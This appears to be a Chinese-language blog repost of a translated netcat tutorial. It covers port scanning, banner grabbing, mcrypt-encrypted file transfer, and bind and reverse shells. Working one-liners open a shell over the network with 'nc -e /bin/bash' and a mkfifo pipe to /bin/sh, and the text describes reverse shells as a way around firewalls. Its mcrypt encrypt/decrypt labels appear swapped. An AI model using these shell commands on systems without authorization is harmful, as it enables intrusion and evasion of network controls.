• netcat的使用


    1,端口扫描
    端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口,帮助他们识别系统中的漏洞。

    $nc -z -v -n 172.31.100.7 21-25
    

    可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
    z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换(谢谢@jxing 指点)

    v 参数指使用冗余选项(译者注:即详细输出)

    n 参数告诉netcat 不要使用DNS反向查询IP地址的域名

    这个命令会打印21到25 所有开放的端口。Banner是一个文本,Banner是一个你连接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner。

    一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。

    $ nc -v 172.31.100.7 21
    

    netcat 命令会连接开放端口21并且打印运行在这个端口上服务的banner信息。

    加密你通过网络发送的数据
    如果你担心你在网络上发送数据的安全,你可以在发送你的数据之前用如mcrypt的工具加密。

    服务端

    $nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
    

    使用mcrypt工具加密数据。
    客户端

    $mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567
    

    使用mcrypt工具解密数据。
    以上两个命令会提示需要密码,确保两端使用相同的密码。

    这里我们是使用mcrypt用来加密,使用其它任意加密工具都可以。

    8,打开一个shell
    我们已经用过远程shell-使用telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使用netcat创建远程shell。

    假设你的netcat支持 -c -e 参数(默认 netcat)

    Server
    
    $nc -l 1567 -e /bin/bash -i
    Client
    $nc 172.31.100.7 1567
    

    这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash
    假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell

    Server

    $mkfifo /tmp/tmp_fifo
    $cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
    

    这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口1567上。至此,我们已经把netcat的输出重定向到fifo文件中。
    说明:

    从网络收到的输入写到fifo文件中

    cat 命令读取fifo文件并且其内容发送给sh命令

    sh命令进程受到输入并把它写回到netcat。

    netcat 通过网络发送输出到client

    至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。

    在客户端仅仅简单连接到服务器

    Client

    $nc -n 172.31.100.7 1567
    

    你会得到一个shell提示符在客户端
    葱油拌面
    葱油拌面
    翻译于 2013/04/10 20:05

    其它翻译版本 (1)
    反向shell
    反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。

    服务端

    $nc -l 1567
    

    在客户端,简单地告诉netcat在连接完成后,执行shell。
    客户端

    $nc 172.31.100.7 1567 -e /bin/bash
    

    现在,什么是反向shell的特别之处呢
    反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为172.31.100.7,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。

  • 相关阅读:
    day13_迭代器,生成器
    作业礼包
    day12_装饰器进阶
    装饰器作业
    day11_装饰器
    函数作业
    day10-函数进阶
    数据类型-习题解答
    day09_函数
    PHP 完美分页
  • 原文地址:https://www.cnblogs.com/tomyyyyy/p/11096296.html
Copyright © 2020-2023  润新知